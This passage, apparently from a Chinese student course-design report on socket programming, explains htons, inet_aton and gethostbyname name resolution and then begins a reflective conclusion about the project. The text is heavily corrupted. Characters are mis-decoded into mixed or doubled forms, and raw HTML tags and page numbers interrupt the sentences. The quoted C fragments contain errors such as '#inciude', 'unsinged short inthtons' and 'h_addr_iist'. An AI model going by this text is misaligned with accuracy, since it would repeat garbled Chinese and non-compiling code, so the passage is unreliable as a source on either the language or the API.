102、節(jié)順序，#inciude <netinet / in.h > 定義了unsinged short inthtons（unsigned short int hostshort）；用于將主機(jī)字節(jié)順序轉(zhuǎn)換為網(wǎng)絡(luò)字節(jié)順序。</p><p>　　Line 15：套接字地址結(jié)構(gòu)初始化為0。</p><p>　　Line 18-25：inet_aton 將字符串形式的IP 地址轉(zhuǎn)換為網(wǎng)絡(luò)字節(jié)

103、順序的32 位IP 地址。程序首先假定是IP 地址形式，使用inet_aton 來(lái)進(jìn)行地址轉(zhuǎn)換，如果轉(zhuǎn)換成功表示確實(shí)是IP 地址，于是完成轉(zhuǎn)換，若函數(shù)轉(zhuǎn)換錯(cuò)誤，表明給定的是域名地址形式，則調(diào)用函數(shù)gethostbyname 來(lái)進(jìn)行域名查找，在返回的hostent</p><p>　　結(jié)構(gòu)中h_addr_iist[0]中存儲(chǔ)著IP 地址列表中的第一個(gè)值。gethostbyname 函數(shù)的輸入?yún)?shù)是欲查詢的主機(jī)名（C

104、 字符串類型），如果調(diào)用成功，它返回一個(gè)指向結(jié)構(gòu)hostent 的指針，該結(jié)構(gòu)中包含了該主機(jī)所有的IPv4 和IPv6 地址；如果調(diào)用失敗，函數(shù)返回NULL 指針，并將錯(cuò)誤的原因記錄在變量h_errno中。函數(shù)的語(yǔ)法如下：</p><p>　　#inciude<netdb.h></p><p>　　extern int h_errno；</p><p>

105、　　struct hostent*gethostbyname（const char *name）；</p><p><b>　　6 結(jié)束語(yǔ)</b></p><p>　　兩周的課程設(shè)計(jì)結(jié)束了，在這次的課程設(shè)計(jì)中不僅檢驗(yàn)了我所學(xué)習(xí)的知識(shí)，也培養(yǎng)了我如何去把握一件事情，如何去做一件事情，又如何完成一件事情。在設(shè)計(jì)過(guò)程中，和同學(xué)們相互探討，相互學(xué)習(xí)，相互監(jiān)督。學(xué)會(huì)了合作，學(xué)

106、會(huì)了運(yùn)</p><p>　　籌帷幄，學(xué)會(huì)了理解，學(xué)會(huì)了寬容，也學(xué)會(huì)了做人與處世。</p><p>　　課程設(shè)計(jì)是我們專業(yè)課程知識(shí)綜合應(yīng)用的實(shí)踐訓(xùn)練，著是我們邁向社會(huì)，從事職業(yè)工作前一個(gè)必不少的過(guò)程．”千里之行始于足下”，通過(guò)這次課程設(shè)計(jì)，我深深體會(huì)到這句千古名言的真正含義．我今天認(rèn)真的進(jìn)行課程設(shè)計(jì)，學(xué)會(huì)腳踏實(shí)地邁開(kāi)這一步，就是為明天能穩(wěn)健地在社會(huì)大潮中奔跑打下堅(jiān)實(shí)的基礎(chǔ)．</p&g